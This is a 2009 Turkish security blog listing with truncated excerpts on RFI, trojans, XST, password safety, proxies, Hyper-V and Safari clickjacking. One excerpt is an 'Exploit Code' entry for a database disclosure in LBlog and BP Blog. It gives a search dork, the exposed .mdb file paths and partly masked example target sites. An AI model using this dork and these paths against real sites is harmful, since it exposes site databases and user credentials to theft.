Skip to content

Remote File Inclusion - Oluşumu ve Güvenliği

June 10, 2009 yazan Emre ÇOLAK

Remote File Inclusion : Uzaktan dosya dahil etme anlamına gelmektedir.

RFI bug bulunurken bazı parametrelere dikkat edilir, bunlar :

INCLUDE
/ INCLUDE ONCE : Bu kod ile uzaktan dosya dahil edilir. Uzun satırlar
alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek
satıa indirgenir.

REQUIRE / REQUIRE ONCE :  Bu kodda Include
kodunun yaptığı işlevi gerçekleştirir. Fakat include ile kodlanmış bir
sayfada çağrılan (dahil edilen) dosya bulunamazsa PHP yorumlayıcımız bu

Trojan [Truva Atları]

June 10, 2009 yazan Emre ÇOLAK

Trojanler şeklinde yazılır ve " troyın " diye okunular. Trojanler
yararlı gibi gözüken bir programın içine gizlenmiş zararlı
programlardır. Örneğin kullanıcı bir görünürde olan bir programı
çalıştırır ancak bu sırada görünürde olmayan asıl program devreye girer.

Trojanler,
saldırganın sizin sisteminize dışarıdan ulaşmasına erişebilmesini
sağlar. Trojanler kendilerini sistemden bir parçaymış gibi gösterir ve
sistem her açık olduğunda yada her açıldığında devreye girer. Saldırgan

Cross Site Tracing (XST)

June 7, 2009 yazan x0x

x0x kullanıcısının resmi

Cross Site Tracing (XST)

Cross Site Tracing, hakkında Türkçe doküman bulunmayan, XSS ile yakından benzer olan bir

vulnerable.

Giriş

Kişisel Güvenlik

June 4, 2009 yazan x0x

x0x kullanıcısının resmi

Şifre Seçimi ve Kullanımı
İnternet ortamın herkesin hesapları mevcuttur. Tabi ki de bu hesaplara girerken şifreler kullanılmaktadır. Peki bu şifreleri seçerken ne kadar güvenli seçiyoruz ? yada şifreleri yazarken ne kadar bu güvenliğimizi düşünüyoruz. Çoğu kişi basit şifreler seçebiliyor ve bunların çözülme şansı yüzdelik ihtimal ile % 75 ‘tir. Şifre seçiminde ve kullanımında dikkat edilmesi gerekenler ;

ubuntu proxy kurulumu

May 31, 2009 yazan FatihGenc

Vtunnel ktunnel v.s. sitelerin kullanımı canınızı sıkıyor ise ve
uzaklarda bir yerlerde Türkiye sınırları dışında bir sunucunuz varsa. Sunucunuz üzerine kuracağınız parola sorgulamalı proxy ile youtube gibi yasaklanmış sitelere erişebilirsiniz.

nasıl mı?

Linux Sistem Uzmanı Nasıl Olunur

May 30, 2009 yazan kazımbirdal

kazımbirdal kullanıcısının resmi

Bu metinde nasıl Linux Sistem Uzmanı olunacağı ile ilgili bilgiler verilmiştir. Yol göstertme amaçlıdır.

Istanbul Bilgi Güvenliği Konferansı 10 Haziran'da

May 26, 2009 yazan warex

warex kullanıcısının resmi

IstSec -İstanbul Güvenlik Konferansı- bilgi güvenliği alanında çalışan, bu alana merak duyan ve konusunun uzmanları arasında bilgi paylaşımını yayma amaçlı oluşturulmuş bir etkinlik. 

Yılda 2 defa yapılması planlanan ürün/teknoloji bağımsız bu etkinliğin ilki, 10 Haziran 2009 Çarşamba günü Microsoft Istanbul ofisinde yapılıyor. 

LBlog Ve BBlog veritabanı ifşa açığı admin\db\newFolder\Lblog.mdb

May 14, 2009 yazan by_netex

Exploit Code :  

Dork:''Powered By Lblog''
exploit: " admin\db\newFolder\Lblog.mdb "db(database)
BP Blog V6.0 & V7.0 & V8.0 & V9.0 Database Disclosure Vulnerability
##############################
## {E} www.site.com/{path}/Blog.mdb
## {E}
V6.0 -->> www...s.net/blog/Blog.mdb
V7.0 -->> www.ig...ty.com/blog/Blog.mdb
V8.0 -->> www.ke....org/blog/Blog.mdb
V9.0 -->> www.its...fc.com/blog/Blog.mdb

Hyper-V Mimarisi ve Microkernelized Hypervisor

May 4, 2009 yazan Serhat AKINCI

Aslında bu makaleyi çok uzun zaman önce yazmayı planlıyordum. Ama bu makale diğer makaleler gibi step by step kurulum aşamaları ve ekran görüntüleri yerine, teorik bilgiler ve paragraflardan oluşacağı için biraz fazla zaman ayırmak gerekiyordu ve yeni fırsatım oldu. Sunucu sanallaştırma teknolojilerini anlamak için nasıl çalıştıklarını bilmek önemli çünkü işin sırrı mimaride gizli.

Safari Web Browser ClickJacking Güvenlik Açığı

March 30, 2009 yazan x0x

x0x kullanıcısının resmi

Safari Web Browser'larda ClickJacking tespit edildi.

 

ClickJacking'lere karşı firmaların yama çıkarmadıkça veyahut
güncelleştirme  yapmadıkça kullanıcıların dikkatli olması gerektiği
bildirildi.

 

*Her linke tıklamayın.

*Bilhassa tanımadığınız kişilerden gelen mail,link vs tıklamayın açmayın.

 

Açıkla ilgili henüz bir güvenlik önlemi alınmış değil.

 

AdaptiveThemes